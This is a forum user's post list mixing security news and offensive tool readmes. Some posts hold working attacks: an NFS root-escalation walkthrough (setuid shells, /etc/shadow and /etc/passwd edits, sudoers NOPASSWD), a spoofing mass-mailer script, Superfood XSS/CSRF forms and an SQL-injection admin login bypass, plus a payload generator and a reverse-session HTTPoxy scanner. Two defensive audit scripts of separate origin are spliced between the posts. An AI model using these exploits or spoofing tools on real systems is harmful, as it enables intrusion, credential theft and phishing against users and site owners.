Fi8sVrs (Active Members)
  • Posts: 3206
  • Days Won: 87

Everything posted by Fi8sVrs

  1. The next October 2018 update for Firefox will include tracking protection, as well as an additional layer of protection that will protect its users from crypto mining websites. Tracking Protection in Firefox will be enabled by default, as it is an essential part of today’s Internet. Most users don’t know that this feature exists because it is buried under so many sub-menus. Tracking Protection will protect against malicious JavaScript and also prevent data sharing between websites.

     “You’re often followed by scripts that collect data on where you’ve been and what you’ve done,” Mozilla noted in a Wednesday blog post. “These scripts can eat up your data, slow down your Internet experience and make you see ads for things you may or may not want to admit you looked for when you went down one of those ‘suggested items’ rabbit holes.”

     Tracking protection will stop the process that logs user data for sharing between websites. This is great for Internet users, as it will improve the user experience. The tracking protection feature will also prevent malicious websites from selling your information. This scale of security is good for working professionals and business users. The protection against crypto miners, tracking cookies and the other threats blocked by tracking protection can be very important in helping users evade security risks.

     The release of Firefox 63 will also be simple to use, with new UI elements that provide an easy toggle for tracking protection. The aim of tracking protection is to prevent unwanted advertisements, social sharing scripts and analytics. At present, you won’t be able to block cryptocurrency mining websites with Firefox itself; however, in the meantime you can install add-ons for privacy and for blocking crypto mining activities. The Mozilla Foundation also released the 2018 roadmap, featuring many improvements that will improve the life of developers.

     Via latesthackingnews.com
  2. Overview

     CERT Tapioca is a utility for testing mobile or any other application using MITM techniques. CERT Tapioca development was sponsored by the United States Army Armament Research, Development and Engineering Center (ARDEC) as well as the United States Department of Homeland Security (DHS).

     Installation requirements

     Supported platforms include: Raspbian (Jessie or Stretch), CentOS 7, RedHat Enterprise Linux 7, Fedora (24 through 28), or Ubuntu (14.04, 16.04, or 18.04). Other platforms may work, but the installer has only been tested on these distros.
       • 1GB of RAM
       • Upstream internet connectivity that does not require an explicit proxy.
       • Ability to provide wireless access to your device under test, which means either:
         - An available wired network adapter that a wireless access point can be plugged into.
         - A USB wireless adapter that supports HOSTAP mode, e.g. https://smile.amazon.com/TP-Link-N150-Wireless-Adapter-TL-WN722N/dp/B002SZEOLG

     NOTE: CERT Tapioca installation will transform your system into a Tapioca "appliance". It is not recommended to install it on a system that you use for other purposes.

     Pre-installation

     Install a supported Linux distribution on your machine. Running on bare metal and in a virtual machine are both supported. Any installation style (from text-only through full GUI) for the host OS is supported. Just ensure:
       • Internet connectivity is working.
       • A user named "tapioca" exists and has administrative privileges.
       • The "tapioca" user is logged in.

     Client connectivity options

     Before installing Tapioca, decide how you will be providing network connectivity to the clients under test. Options include:
       • Use a wired network adapter. This adapter should be configured to use the IP 10.0.0.1/24 before attempting installation. Other addressing schemes can be used, but will require editing tapioca.cfg and /etc/dhcp/dhcpd.conf.
       • Use a wireless USB adapter that supports HOSTAP mode.

     Security notes

     CERT Tapioca requires root privileges for several capabilities that it uses. For this reason, the Tapioca installer configures a system to not prompt the user for sudo privileges. Any user with access to the CERT Tapioca system will have root privileges.

     The "Full HTTPS inspection" certificate/key combination is static across all CERT Tapioca installations. For this reason, any system or device that has the full HTTPS inspection mitmproxy root CA certificate installed should not be used on untrusted networks. The same capability that allows you to use Tapioca to fully inspect HTTPS traffic can allow anyone else with a CERT Tapioca installation to perform the same inspection.

     Installation

       1. Obtain the Tapioca code. This can be accomplished by performing a git clone of the Tapioca repository, or by downloading and extracting a zip file of the repository.
       2. Ensure that the Tapioca code lives in the /home/tapioca/tapioca directory. If you have obtained Tapioca via a zip file, this may require that you rename the tapioca-master directory to tapioca.
       3. Run the installer:

            [tapioca@localhost tapioca]$ ./install_tapioca.sh

       4. Follow any prompts.
       5. Reboot when done. If given a choice, log in with the tapioca user and choose the Xfce login session.

     If for any reason the installation fails, check and correct any relevant errors and run ./install_tapioca.sh again.

     Tapioca Quick Start

     Testing apps on wireless devices using a HOSTAP adapter
       1. Connect a HOSTAP-capable WiFi adapter to your Tapioca machine.
       2. Click the Software WiFi AP button (radio tower) to enable your wireless access point.
       3. Connect your device to the Tapioca access point.
       4. Click the Tapioca GUI button to launch the main testing interface.

     Testing apps on wireless devices using an access point
       1. Configure the Tapioca machine's second network adapter to be 10.0.0.1/24. If this network was not already configured at install time, re-run ./install_tapioca.sh or manually edit tapioca.cfg to specify this network device name for internal_net.
       2. Connect the access point uplink port to the Tapioca LAN port.
       3. Connect your device to the access point.
       4. Click the Tapioca GUI button to launch the main testing interface.

     Testing apps on virtual machines
       1. Configure the Tapioca machine's second network adapter to be 10.0.0.1/24. If this network was not already configured at install time, re-run ./install_tapioca.sh or manually edit tapioca.cfg to specify this network device name for internal_net.
       2. Click the Tapioca GUI button to launch the main testing interface.

     Tapioca Desktop Layout

     Once you have installed Tapioca, you should end up with a screen like the one below. Individual icons may vary slightly across platforms.
       • Browse results: Open a file manager to view already-tested applications.
       • Terminal: Open a terminal to allow manual execution of scripts.
       • Web Browser: Open the Chromium web browser.
       • Enable software WiFi AP: This button will configure a connected WiFi adapter for HOSTAP mode. This will allow you to wirelessly connect your client device to Tapioca for traffic inspection.
       • Tapioca GUI: Launch the main Tapioca interface.
       • Capture all traffic: Use tcpdump to capture all raw network traffic without interfering.
       • SSL validation: Use mitmproxy to intercept HTTP/HTTPS traffic, using an untrusted root certificate. Any HTTPS traffic that passes through is an indication of a client that isn't validating HTTPS certificates.
       • Full HTTPS inspection: Use mitmproxy to intercept HTTP/HTTPS traffic, using a root certificate that has been installed on the client system. This allows full inspection of non-pinned HTTPS traffic.
       • Stop capture: Stop any (tcpdump, mitmproxy) capture.

     Tapioca GUI usage

     While the Tapioca platform provides buttons to launch individual tests, the Tapioca GUI will provide most of the capabilities that you will need.

     Tapioca Capture Modes

     To be able to run all of the reports included with Tapioca, three captures are required:
       • All traffic with tcpdump: In "All traffic with tcpdump" mode, Tapioca doesn't interfere with HTTPS negotiation. This allows Tapioca to inspect the HTTPS handshakes that occur between a client and a server. If a client is using insecure crypto, or protocols other than HTTP/HTTPS, then the tcpdump capture will be required to detect this. This capture is required to allow the Crypto test report to be generated.
       • Verify SSL validation: In "Verify SSL validation" mode, Tapioca will intercept web traffic, and the HTTPS communications between the client and Tapioca will use an invalid root CA certificate. Any client that allows HTTPS traffic through Tapioca without warning is vulnerable to malicious interception. Despite the client using HTTPS, it is not receiving the benefits that HTTPS aims to provide. This capture is required to allow the SSL test report to be generated.
       • Full HTTPS inspection: In "Full HTTPS inspection" mode, Tapioca will intercept web traffic, and the HTTPS communications between the client and Tapioca will use a valid root CA certificate that has been installed on the client. This allows searching for content in web traffic, even if it has been encrypted with HTTPS. This capture is required to allow Search capabilities within encrypted, but not pinned, network traffic.

     Strategies for Using Tapioca

     For each client application being tested, run through the normal operations for using the client while the traffic is being captured in each of the three modes:
       1. All traffic with tcpdump
       2. Verify SSL validation
       3. Full HTTPS inspection

     At the end of each test, be sure to stop the capture using the Tapioca GUI or by clicking the stop sign icon at the bottom of the screen. Before starting the next test, be sure to terminate the application being tested. An uninstall of the application between tests will ensure thoroughness of the test. For example, some applications install a service that continues to run even after the application is terminated.

     After traffic is captured in all three modes, press the "Generate reports" button. The SSL test and the Crypto test have PASSED/FAILED statuses. The network connectivity test simply generates a report of hosts contacted. Results for all three tests can be viewed by using the Tapioca GUI.

     When entering any data into a form, always use the same values. This allows you to search for your data. For example, if you are presented with a password field, always using "passssss" will allow you to search for that value in the traffic.

     Manual Execution of Scripts

     If you are not using the Tapioca GUI, need to troubleshoot problems, or would like to run the utilities against existing network captures (e.g. a pcap file), there are command-line utilities:
       • checkcrypto.py - Validate that HTTPS negotiations are secure (pcap required)
       • checknet.py - Enumerate hosts contacted using which protocols, as well as which host names are resolved (pcap required)
       • checkssl.py - Validate that a client is verifying that an SSL certificate is issued by a trusted provider (mitmproxy log file required)
       • search.py - Search for strings in network captures (pcap and/or mitmproxy log file required)

     Download: tapioca-master.zip or git clone https://github.com/CERTCC/tapioca.git
     Source
  3. Security researchers have discovered a severe vulnerability in the EOS blockchain platform that could allow remote hackers to take complete control over the node servers that maintain the technology. EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain infrastructure, just like Ethereum.

     Discovered by Chinese security researchers at Qihoo 360 (Yuki Chen of the Vulcan team and Zhiniang Peng of the Core security team), the vulnerability is a buffer out-of-bounds write issue which resides in the function used by the node server to parse contracts. To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server. As soon as the vulnerable process parser reads the WASM file, the malicious payload gets executed on the node, which could then also be used to take control over the supernode in the EOS network, i.e. the servers that collect transaction information and pack it into blocks.

     Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network." Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post. The pair responsibly reported the vulnerability to the maintainers of the EOS project, and they have already released a fix for the issue on GitHub.

     Via thehackernews.com
  4. SQLi Exploiter

     WARNING: This is not a script kiddie tool! Usage requires detailed knowledge of the vulnerability, a thorough understanding of the functionality available in the affected RDBMS, and the ability to write Python. The good news is that it is highly configurable.

     Born out of a need to exploit SQL injection vulnerabilities that sqlmap just couldn't find. Always try sqlmap first. It is highly customizable and only fails in very complicated injection scenarios. However, when it does fail, use this. Enjoy! - Tim (@lanmaster53) Tomes

     Getting Started
       1. Install the dependencies: pip install -r REQUIREMENTS.txt
       2. Edit the config.py file and follow the numbered configuration steps.
       3. Run the script: python ./sqli-exploiter.py

     Developed and tested in Python 3, but may also work in Python 2. I have no idea...

     Download: sqli-exploiter-master.zip or: git clone https://github.com/lanmaster53/sqli-exploiter.git
     Source
  5. After solving several OSCP challenges, we decided to write an article on the various methods used for Linux privilege escalation, which could be helpful for our readers in their penetration testing projects. In this article, we will learn how to exploit a misconfigured NFS share to gain root access to a remote host machine.

     Table of contents
       • Introduction of NFS
       • Misconfigured NFS lab setup
       • Scanning NFS shares: Nmap script, showmount
       • Exploiting NFS server for privilege escalation via: Bash file, C program file, Nano/vi
       • Obtain shadow file
       • Obtain passwd file
       • Obtain sudoers file

     Let’s start!!

     Network File System (NFS)

     Network File System permits a user on a client machine to mount shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. NFS uses TCP/UDP port 2049 for sharing files/directories over a network.

     Misconfigured NFS lab setup

     Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. BUT to configure a weak NFS server we will look only at the /etc/exports file. To install the NFS service, execute the commands below in your terminal and open the /etc/exports file for configuration.

       sudo apt-get update
       sudo apt install nfs-kernel-server
       nano /etc/exports

     The /etc/exports file holds a record for each directory that you expect to share with network machines. Each record describes how one directory or file is shared. The basic syntax for configuration is:

       Directory Host-IP(Option-list)

     Various options define which type of privilege a machine will have over the shared directory:
       • rw: Permits clients both read and write access to the shared directory.
       • ro: Permits clients read-only access to the shared directory.
       • root_squash: Prevents file requests made by user root on the client machine, because NFS maps the root user to the nfsnobody user, which is an unprivileged user account.
       • no_root_squash: Basically gives the root user on the client authority to access files on the NFS server as root. This can lead to serious security implications.
       • async: Speeds up transfers but can cause data corruption, as the NFS server doesn’t wait for the complete write operation to be finished on stable storage before replying to the client.
       • sync: Does the inverse of async: the NFS server replies to the client only after the data is finally written to stable storage.

     Hopefully it is now clear to you how to configure the /etc/exports file using a particular option. An NFS system is considered weak or misconfigured when the following entry/record is placed into it for sharing any directory:

       /home *(rw,no_root_squash)

     The above entry shows that we have shared the /home directory and allowed the root user on the client to access files for read/write operations, and the * sign denotes connections from any host machine. After that, restart the service with the following command:

       sudo /etc/init.d/nfs-kernel-server restart

     Scanning NFS shares

     Nmap
     You can take help of an Nmap script to scan the NFS service in the target network, because it reveals the names of the shared directories of the target’s system if port 2049 is open.

       nmap -sV --script=nfs-showmount 192.168.1.102

     Basically nmap runs the showmount -e command to identify the shared directory, and here we can clearly observe that /home * is a shared directory for everyone in the network.

     Showmount
     The same thing can be done manually by using the showmount command, but for that install the nfs-common package on your local machine with the following commands:

       apt-get install nfs-common
       showmount -e 192.168.1.102

     Exploiting NFS server for privilege escalation

     Bash file
     Now execute the commands below on your local machine to exploit the NFS server for root privilege:

       mkdir /tmp/raj
       mount -t nfs 192.168.1.102:/home /tmp/raj
       cd /tmp/raj
       cp /bin/bash .
       chmod +s bash
       ls -la bash

     The above commands will create a new folder raj inside /tmp and mount the shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying /bin/bash and setting the SUID permission. Use the df -h command to get a summary of the amount of free disk space on each mounted disk.

     First, you need to compromise the target system and then move to the privilege escalation phase. Suppose you successfully log in to the victim’s machine through ssh. Now we know that /home is the shared directory, therefore move inside it and follow the steps below to get root access to the victim’s machine.

       cd /home
       ls
       ./bash -p
       id
       whoami

     So, that was the first method to pwn root access with the help of /bin/bash if the NFS system is weakly configured.

     C program
     Similarly, we can use a C program file for root privilege escalation. We have generated a C program file and copied it into the /tmp/raj folder. Since it is a C program file, first we need to compile it and then set the SUID permission as done above.

       cp asroot.c /tmp/raj
       cd /tmp/raj
       gcc asroot.c -o shell
       chmod +s shell

     Now repeat the above process and run the shell file to obtain root access.

       cd /home
       ls
       ./shell
       id
       whoami

     So, that was the second method to pwn root access with the help of a C program if the NFS system is misconfigured.

     Nano/vi
     The nano and vi editors are both among the most dangerous applications that can lead to privilege escalation if shared directly or indirectly. In our case, it is not shared directly, but still we can use any application for exploiting root access. Follow the steps below:

       cp /bin/nano .
       chmod 4777 nano
       ls -la nano

     Since we have set the SUID permission on nano, after compromising the target’s machine at least once we can escalate to root privilege through various techniques.

       cd /home
       ls
       ./nano -p /etc/shadow

     When you execute the above command it will open the shadow file, from where you can copy the password hash of any user. Here I have copied the password hash of the user raj into a text file, saved it as shadow, and then used John the Ripper to crack that hash.

     Awesome!!! It tells us raj has the password 123. Now you can either log in as raj and verify its privileges, or follow the next step.

     Passwd file
     Now we know the password of the raj user, but we are not sure whether raj has root privilege or not; therefore, we can add raj into the root group by editing the /etc/passwd file. Open the passwd file with the help of nano and make the following change:

       ./nano -p /etc/passwd
       raj:x:0:0:,,,:/home/raj:/bin/bash

     Now use the su command to switch user and enter the password found for raj.

       su raj
       id
       whoami

     Great!!! This was another way to get root access to the target’s machine.

     Sudoers file
     We can also escalate to root privilege by editing the sudoers file, where we can assign ALL privileges to our non-root user (ignite). Open the sudoers file with the help of nano and make the following change:

       ./nano -p /etc/sudoers
       ignite ALL=(ALL:ALL) NOPASSWD: ALL

     Now use the sudo bash command to access a root terminal and get root privilege.

       sudo bash
       id
       whoami

     Conclusion: Thus we saw the various approaches to escalate to root privilege if port 2049 is open for NFS services and the server is weakly configured. For your practice, you can play with ORCUS, which is a vulnerable lab from VulnHub, and read the article here.

     Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here
     Source: hackingarticles.in
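The post above turns on a single /etc/exports line: a share exported to every host with no_root_squash. The following is an added example, not part of the post or of Hacking Articles, written from the defender's side: it parses /etc/exports-style text (the same "Directory Host(Option-list)" syntax the post describes) and flags shares exported to "*" and/or with no_root_squash, so an administrator can catch the weak entry before any client can use it. The exports content embedded in the script is a constructed sample, not taken from any real host; pass a real file path as the first argument to audit a live system.

```python
"""Audit NFS export entries for the weak configuration the post describes.

Added example (not part of the original post or of Hacking Articles):
parses /etc/exports-style text and flags shares exported to any host
('*') and/or with no_root_squash, so a defender can catch the
"/home *(rw,no_root_squash)" pattern before a client can abuse it.
"""
import re
import sys

# Constructed sample exports content; not taken from a real host.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home *(rw,no_root_squash)
/srv/data 192.168.1.0/24(rw,sync,root_squash)
/var/backups backup.example.internal(ro,sync)
/export *(ro) 10.0.0.5(rw,no_root_squash)
"""

# One client specification: a host, optionally followed by (opt,opt,...).
CLIENT_RE = re.compile(r'^([^(]*)(?:\((.*)\))?$')


def parse_exports(text):
    """Return a list of (directory, host, options) tuples, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        directory, clients = fields[0], fields[1:]
        for client in clients:
            m = CLIENT_RE.match(client)
            if not m:
                continue
            # "(opts)" with no host in front is exported to every host,
            # which is how exportfs treats it (it only prints a warning).
            host = m.group(1) or '*'
            options = [o for o in (m.group(2) or '').split(',') if o]
            entries.append((directory, host, options))
    return entries


def audit_exports(entries):
    """Return (directory, host, severity, reason) for each risky export."""
    findings = []
    for directory, host, options in entries:
        any_host = host == '*'
        no_squash = 'no_root_squash' in options
        writable = 'rw' in options
        if any_host and no_squash:
            findings.append((directory, host, 'critical',
                             'exported to every host with no_root_squash: '
                             'any client root can plant setuid binaries'))
        elif no_squash:
            findings.append((directory, host, 'high',
                             'no_root_squash: client root acts as server root'))
        elif any_host and writable:
            findings.append((directory, host, 'medium',
                             'writable by every host'))
    return findings


def main(argv):
    # Audit a real file when a path is given, otherwise the constructed sample.
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_EXPORTS
    for directory, host, severity, reason in audit_exports(parse_exports(text)):
        print('[%s] %s -> %s: %s' % (severity.upper(), directory, host, reason))


if __name__ == '__main__':
    main(sys.argv)
```

Run it with no arguments to see the two findings in the sample (the /home line is rated critical, the 10.0.0.5 client on /export is rated high because root squashing is disabled even though the host list is narrow); `python audit_exports.py /etc/exports` audits the local server. The severity ladder is a deliberate choice: a wildcard host alone is only flagged when the share is writable, because a read-only world export leaks data but does not let a client write setuid files.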
  6. iOS Restriction Passcode Brute Force

     Overview
     This version of the application is written in Python. It is used to crack the restriction passcode of an iPhone/iPad and takes advantage of a flaw in unencrypted backups allowing the hash and salt to be discovered.

     Dependencies
     This has been tested with Python 2.7 and Python 3.6. Requires Passlib; install with pip install passlib.

     Usage
       usage: iOSCrack.py [-h] [-a] [-c] [-b folder] [-t]

       a script to crack the restriction passcode of an iDevice

       optional arguments:
         -h, --help            show this help message and exit
         -a, --automatically   automatically finds and cracks hashes
         -c, --cli             prompts user for input
         -b folder, --backup folder
                               where backups are located
         -t, --test            runs unittest

     How to use
       1. Clone the repository: git clone https://github.com/thehappydinoa/iOSRestrictionBruteForce && cd iOSRestrictionBruteForce
       2. Make sure to use iTunes or libimobiledevice to back up the iOS device to the computer.
       3. Run ioscrack.py with the auto option: python ioscrack.py -a

     How to test
     Run ioscrack.py with the test option: python ioscrack.py -t

     How it works
       • Done by using the pbkdf2 hash with the Passlib Python module
       • Tries the top 20 four-digit PINs
       • Tries birthdays between 1900-2017
       • Brute-forces PINs from 1 to 9999
       • Adds successful PINs to a local database

     How to protect against
       • Encrypt backups
       • Back up only on trusted computers

     Contributing
     Best ways to contribute:
       • Star it on GitHub - if you use it and like it, please at least star it
       • Promote
       • Open issues
       • Submit fixes and/or improvements with pull requests

     Promotion
     Like the project? Please support to ensure continued development going forward: star this repo on GitHub; follow me on Twitter and GitHub.

     Acknowledgments: yuejd

     Download: iOSRestrictionBruteForce-master.zip
     Source
  7. Try to format it; it looks awful on the white theme.
  8. SMTP-Mailer: A Python script to send emails using the SMTP protocol. Easy way to spoof emails.

     smtp.py

       #!/usr/bin/env python
       # -*- coding: utf-8 -*-
       # Python 2 script (raw_input, email.MIMEMultipart). Two defects fixed from the
       # posted version: the SMTP session is closed once after the loop rather than
       # after the first message, and the port/TLS prompts no longer eval() input.
       import smtplib
       from email.MIMEMultipart import MIMEMultipart
       from email.MIMEText import MIMEText


       def checkConnection(server, port, tls, user, passwd):
           """Open an SMTP session, optionally upgrade it with STARTTLS, and log in.
           Returns the connected SMTP object, or False on any failure."""
           try:
               connect = smtplib.SMTP(server, port)
               connect.ehlo()
               if tls:
                   connect.starttls()
                   connect.ehlo()
               connect.login(user, passwd)
               return connect
           except Exception:
               return False


       def inboxEmail(server, port, tls, user, passwd, maillist, From, subject, mailtext):
           """Send the same HTML body to every address in maillist over one session."""
           smtpConnect = checkConnection(server, port, tls, user, passwd)
           emails = len(maillist)
           success = 0
           for success, sendto in enumerate(maillist, 1):
               content = MIMEMultipart()
               content['From'] = From
               content['To'] = sendto.rstrip()
               content['Subject'] = subject
               htmlscript = mailtext.rstrip()
               content.attach(MIMEText(htmlscript, 'html'))
               print('Pr0 SMTP Email Sender >>> You are going to send to ' + sendto.rstrip())
               smtpConnect.sendmail(From, sendto.rstrip(), content.as_string())
           smtpConnect.quit()   # close the session once, after all messages are sent
           print('\nBastians Email Sender >>> Email to ' + str(success) + '/' + str(emails) + ' Adresses sended!\n')


       print("""
         SMTP Mailer  -  MOHAMED NOUR
       """)

       smtpServer = raw_input('\nPlease enter the SMTP Server (Hostname or IP Adress): ')
       smtpPort = int(raw_input('Please enter the SMTP Port : '))
       smtpTLS = int(raw_input('Secure the Email with TLS ? (Yes [1] or No [0]): '))
       smtpUser = raw_input('Enter the SMTP Username: ')
       smtpPass = raw_input('Enter the SMTP Password: ')
       if checkConnection(smtpServer, smtpPort, smtpTLS, smtpUser, smtpPass):
           print('\nPr0 SMTP Email Sender >>> SMTP Status // Connected!')
           sendFrom = raw_input('\nEnter the Receiver: ')   # this value is used as the From address
           sendSubj = raw_input('Enter the Subject: ')
           userlist = raw_input('Enter the Path of the Email List: ')
           try:
               maillist = open(userlist).readlines()
               print('\n Pr0 SMTP Email Sender >>> I found currently ' + str(len(maillist)) + ' Email Adresses.')
               htmlscript = raw_input('\nEnter here the Path to your HTML Script: ')
               try:
                   html = open(htmlscript).read()
                   raw_input('ENTER, to send the HTML Script to ' + str(len(maillist)) + ' ...\n')
                   try:
                       inboxEmail(smtpServer, smtpPort, smtpTLS, smtpUser, smtpPass, maillist, sendFrom, sendSubj, html)
                   except Exception:
                       print('ERROR: I CANT USE THE EMAIL!')
               except Exception:
                   print('The HTML File cannot get readed yet or is empty.')
           except Exception:
               print('The .txt File cannot get readed or is empty.')
       else:
           print('I cant connect to the Server :/')

     Source
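The script above lets any authenticated SMTP user put an arbitrary address in the From header, which is the mismatch that DMARC identifier alignment exists to expose on the receiving side. The following is an added example, not part of the post or of the smtp.py script: it takes a raw RFC 5322 message, compares the domain of the visible From header with the Return-Path (envelope sender) domain and with any dkim=pass result recorded in an Authentication-Results header, and reports whether the message passes relaxed alignment. Both messages embedded in it are constructed samples; the organizational-domain helper uses a last-two-labels approximation rather than a public suffix list, which is an assumption a production filter would need to replace.

```python
"""Check whether a message's visible From domain aligns with its envelope sender.

Added example, not part of the original post or of the smtp.py script.
Implements the DMARC idea of identifier alignment: the RFC 5322 From domain
must share an organizational domain with the SPF identity (Return-Path /
envelope sender) or with the DKIM signing domain. Sample messages below are
constructed, not captured traffic.
"""
import email
import re
from email.utils import parseaddr

# Constructed sample: From claims the corporate domain, envelope is elsewhere.
SPOOFED_MESSAGE = """\
Return-Path: <bounces@mail-relay.example.net>
Authentication-Results: mx.corp.example.com; spf=pass smtp.mailfrom=mail-relay.example.net
From: "IT Helpdesk" <helpdesk@corp.example.com>
To: user@corp.example.com
Subject: Password reset required
Content-Type: text/html

<p>Your password expires today.</p>
"""

# Constructed sample: envelope sender and DKIM domain match the From domain.
ALIGNED_MESSAGE = """\
Return-Path: <bounces@mail.corp.example.com>
Authentication-Results: mx.corp.example.com; spf=pass smtp.mailfrom=mail.corp.example.com; dkim=pass header.d=corp.example.com
From: "IT Helpdesk" <helpdesk@corp.example.com>
To: user@corp.example.com
Subject: Monthly newsletter

Hello.
"""


def org_domain(domain):
    """Approximate organizational domain: the last two labels.
    Assumption for this example; real filters use the public suffix list."""
    labels = domain.lower().strip('.').split('.')
    return '.'.join(labels[-2:])


def address_domain(header_value):
    """Domain part of the first address in a header value, or '' if none."""
    _, addr = parseaddr(header_value or '')
    return addr.rpartition('@')[2].lower()


def check_alignment(raw_message):
    """Return a dict describing From/envelope/DKIM alignment for a raw message."""
    msg = email.message_from_string(raw_message)
    from_domain = address_domain(msg.get('From'))
    envelope_domain = address_domain(msg.get('Return-Path'))
    auth = msg.get('Authentication-Results') or ''
    dkim = re.search(r'dkim=pass\s+header\.d=([\w.-]+)', auth)
    dkim_domain = dkim.group(1).lower() if dkim else ''

    # Relaxed alignment: the organizational domains must match.
    spf_aligned = bool(envelope_domain) and org_domain(envelope_domain) == org_domain(from_domain)
    dkim_aligned = bool(dkim_domain) and org_domain(dkim_domain) == org_domain(from_domain)
    return {
        'from_domain': from_domain,
        'envelope_domain': envelope_domain,
        'dkim_domain': dkim_domain,
        'spf_aligned': spf_aligned,
        'dkim_aligned': dkim_aligned,
        # DMARC passes when either authenticated identifier aligns with From.
        'aligned': spf_aligned or dkim_aligned,
    }


if __name__ == '__main__':
    for label, raw in (('spoofed', SPOOFED_MESSAGE), ('aligned', ALIGNED_MESSAGE)):
        result = check_alignment(raw)
        print('%-8s From=%s envelope=%s dkim=%s -> aligned=%s' % (
            label, result['from_domain'], result['envelope_domain'],
            result['dkim_domain'] or '-', result['aligned']))
```

The spoofed sample is the instructive case: SPF passes, because the relay really is allowed to send for mail-relay.example.net, yet the message still fails alignment because that domain has nothing to do with the corp.example.com shown to the user. A mail gateway that only checks "spf=pass" would accept it; one that checks alignment, as DMARC does, would not.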
  9. Payload List:

     Binaries Payloads
       1) Android
       2) Windows
       3) Linux
       4) Mac OS
     Scripting Payloads
       1) Python
       2) Perl
       3) Bash
     Web Payloads
       1) ASP
       2) JSP
       3) War
     Encrypters
       1) APK Encrypter
       2) Python Encrypter

     The author does not hold any responsibility for the bad use of this tool; remember that attacking targets without prior consent is illegal and punished by law.

     Download: Terminator-master.zip or git clone https://github.com/MohamedNourTN/Terminator.git
     Mirror: terminator.py
     Source
  10. # Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass
      # Date: 2018-05-20
      # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
      # Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30
      # Version: 1.0
      # Tested on: Kali linux

      ====================================================
      # Description: Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities:
      ====================================================

      # POC 1 : Persistent cross site scripting :
      1) After creating an account, go to your profile.
      2) Navigate to "Update profile" and put this payload: "/><script>alert('xss')</script>
      3) You will have an alert box in the page.

      ====================================================

      # POC 2 : CSRF :
      Attacker can change user's authentication directly:

      # User's CSRF exploit :
        <html>
        <head>
        <title>CSRF POC</title>
        </head>
        <body>
        <form action="http://restaurant.thesoftking.com/updateprofile" method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="1000000000">
        <input type="hidden" name="address" value="anything">
        </form>
        <script>
        document.forms[0].submit();
        </script>
        </body>
        </html>

      # Admin page CSRF exploit :
        <form action="http://restaurant.thesoftking.com/admin/setgeneral.php" method="post">
        <input name="name" value="exploit" type="hidden">
        <input name="wcmsg" value="test" type="hidden">
        <input name="address" value="test2" type="hidden">
        <input name="mobile" value="1000000" type="hidden">
        <input name="email" value="test@test.com" type="hidden">
        <input name="currency" value="decode" type="hidden">
        </form>
        <script>
        document.forms[0].submit();
        </script>

      ====================================================

      # POC 3 : Authentication bypass :
      # Attacker can bypass admin panel without any authentication :
      Path : /admin
      Username : ' or 0=0 #
      Password : anything

      ====================================================
      Source: exploit-db.com
  11. HTTPoxy Exploit Scanner by 1N3 @CrowdShield (https://crowdshield.com)
      Last Updated: 20160720

      ABOUT: PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org.

      REQUIREMENTS: Requires ncat to establish a reverse session.

      USAGE:
        ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000

      This will scan https://target.com with a list of common CGI files while injecting a Proxy header pointing back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable.

      DISCLAIMER: I take no responsibility for wrongdoing or misuse of this exploit.

      Download: HTTPoxyScan-master.zip or: git clone https://github.com/1N3/HTTPoxyScan.git
      Source
  12. I posted two news items, man.
  13. salt-scanner

      Linux vulnerability scanner based on Salt Open and the Vulners audit API, with Slack notifications and JIRA integration.

      Features
        • Slack notification and report upload
        • JIRA integration
        • OpsGenie integration

      Requirements
        • Salt Open 2016.11.x (salt-master, salt-minion)¹
        • Python 2.7
        • salt (you may need to install gcc, gcc-c++, python dev)
        • slackclient
        • jira
        • opsgenie-sdk

      Note: Salt Master and Minion versions should match. Salt-Scanner supports Salt version 2016.11.x. If you are using version 2017.7.x, replace "expr_form" with "tgt_type" in salt-scanner.py.

      Usage
        $ ./salt-scanner.py -h
        ==========================================================
        Vulnerability scanner based on Vulners API and Salt Open
        [ASCII-art banner]
        Salt-Scanner 0.1 / by 0x4D31
        ==========================================================
        usage: salt-scanner.py [-h] [-t TARGET_HOSTS] [-tF {glob,list,grain}]
                               [-oN OS_NAME] [-oV OS_VERSION]

        optional arguments:
          -h, --help            show this help message and exit
          -t TARGET_HOSTS, --target-hosts TARGET_HOSTS
          -tF {glob,list,grain}, --target-form {glob,list,grain}
          -oN OS_NAME, --os-name OS_NAME
          -oV OS_VERSION, --os-version OS_VERSION

        $ sudo SLACK_API_TOKEN="EXAMPLETOKEN" ./salt-scanner.py -t "*"
        ==========================================================
        Vulnerability scanner based on Vulners API and Salt Open
        [ASCII-art banner]
        Salt-Scanner 0.1 / by 0x4D31
        ==========================================================
        + No default OS is configured. Detecting OS...
        + Detected Operating Systems:
           - OS Name: centos, OS Version: 7
        + Getting the Installed Packages...
        + Started Scanning '10.10.10.55'...
           - Total Packages: 357
           - 6 Vulnerable Packages Found - Severity: Low
        + Started Scanning '10.10.10.56'...
           - Total Packages: 392
           - 6 Vulnerable Packages Found - Severity: Critical
        + Finished scanning 2 host (target hosts: '*').
